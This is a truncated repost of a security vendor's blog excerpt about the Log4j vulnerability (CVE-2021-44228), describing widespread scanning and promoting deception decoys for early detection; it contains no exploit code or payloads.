Log4j vulnerability (aka CVE-2021-44228) is one of the most significant vulnerabilities in a decade. Which is saying a lot when you hold it up against prominent issues like SolarWinds.
From the moment of disclosure on Friday, December 10th, the Internet has become a scanning zone for Log4j vulnerabilities. Every publicly addressable IP is being scanned. Bad actors are looking for vulnerable systems to infiltrate. Defenders are looking for vulnerable systems to patch. While the focus has been on systems exposed to the Internet side, the reality is that many Log4j vulnerabilities will also be visible from inside the network and accessible by both adversaries and insider threat actors. In other words, ignoring vulnerabilities not accessible from the Internet is not a sound strategy; these will likely be found and exploited.
Having deception decoys placed in your environment can serve as an early warning system. It helps quickly identify attackers in your environment as they scan for this vulnerability. Specifically, deception technologies like Fidelis Deception® can help protect organizations from zero-day threats before they are published, and before patches or rules are updated. No need to design, configure and tune new rules; once deception is turned on, it can detect the attackers trying to exploit the vulnerability with a near-zero false positive rate.
The Fidelis Threat Research Team has been tracking these scans on both our customer networks as well as public-facing decoys spread out around the world. Alerts from these decoys are useful in understanding the extent that Log4j is being exploited. In this blog, we provide an overview of some of th ..
Support the originator by clicking the read the rest link below.
